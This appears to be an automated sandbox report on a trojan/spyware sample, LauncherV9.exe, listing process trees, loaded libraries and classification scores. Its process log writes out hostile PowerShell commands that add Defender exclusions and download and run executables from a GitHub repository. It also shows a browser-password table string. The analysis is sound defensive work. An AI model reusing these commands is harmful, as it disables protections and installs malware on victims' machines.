Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C0FAB0	22_2_00007FF621C0FAB0
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C0A1C8	22_2_00007FF621C0A1C8
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C13160	22_2_00007FF621C13160
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C16404	22_2_00007FF621C16404
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C02B7C	22_2_00007FF621C02B7C
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BF2390	22_2_00007FF621BF2390
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C0DBAC	22_2_00007FF621C0DBAC
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C196CC	22_2_00007FF621C196CC
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C0E6C0	22_2_00007FF621C0E6C0
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C14EF4	22_2_00007FF621C14EF4
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C08E80	22_2_00007FF621C08E80
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621BF5E40	22_2_00007FF621BF5E40
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C035C8	22_2_00007FF621C035C8
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C17DE8	22_2_00007FF621C17DE8
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C06DE0	22_2_00007FF621C06DE0
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C02D80	22_2_00007FF621C02D80
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C19D68	22_2_00007FF621C19D68
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C0655C	22_2_00007FF621C0655C
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C0E040	22_2_00007FF621C0E040
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C12004	22_2_00007FF621C12004
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C02F84	22_2_00007FF621C02F84
Source: C:\Users\user\AppData\Local\Service.exe	Code function: 22_2_00007FF621C05F90	22_2_00007FF621C05F90

Source: C:\Users\user\AppData\Local\Service.exe	Code function: String function: 00007FF621BF8400 appears 31 times
Source: C:\Users\user\AppData\Local\dll.exe	Code function: String function: 0037B350 appears 34 times

Source: jaclo.exe.12.dr	Static PE information: Section: ZLIB complexity 0.9994480298913043
Source: jaclo.exe.12.dr	Static PE information: Section: ZLIB complexity 0.9970703125
Source: jaclo.exe.12.dr	Static PE information: Section: ZLIB complexity 1.0008951822916667
Source: jaclo.exe.12.dr	Static PE information: Section: .data ZLIB complexity 0.9964956758324236
Source: dll.exe.15.dr	Static PE information: Section: ZLIB complexity 0.998801763803681
Source: dll.exe.15.dr	Static PE information: Section: ZLIB complexity 1.00048828125
Source: dll.exe.15.dr	Static PE information: Section: ZLIB complexity 0.9930826822916666
Source: dll.exe.15.dr	Static PE information: Section: .data ZLIB complexity 0.997007548679194

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@27/18@17/7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\dll.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mov3kju2.sn0.ps1

Jump to behavior

Source: LauncherV9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\zjxbeopkqt\jaclo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\LauncherV9.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\LauncherV9.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: dll.exe, 00000010.00000003.1449494477.0000000004039000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472831625.0000000004039000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1473572942.000000000410E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: LauncherV9.exe	Virustotal: Detection: 49%
Source: LauncherV9.exe	ReversingLabs: Detection: 38%

Source: unknown	Process created: C:\Users\user\Desktop\LauncherV9.exe "C:\Users\user\Desktop\LauncherV9.exe"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\zjxbeopkqt\jaclo.exe "C:\zjxbeopkqt\jaclo.exe"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Users\user\AppData\Local\dll.exe "C:\Users\user\AppData\Local\dll.exe"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\zjxbeopkqt\jaclo.exe "C:\zjxbeopkqt\jaclo.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Users\user\AppData\Local\dll.exe "C:\Users\user\AppData\Local\dll.exe"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Process created: C:\Users\user\AppData\Local\Service.exe "C:\Users\user\AppData\Local\Service.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'"

Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LauncherV9.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\zjxbeopkqt\jaclo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
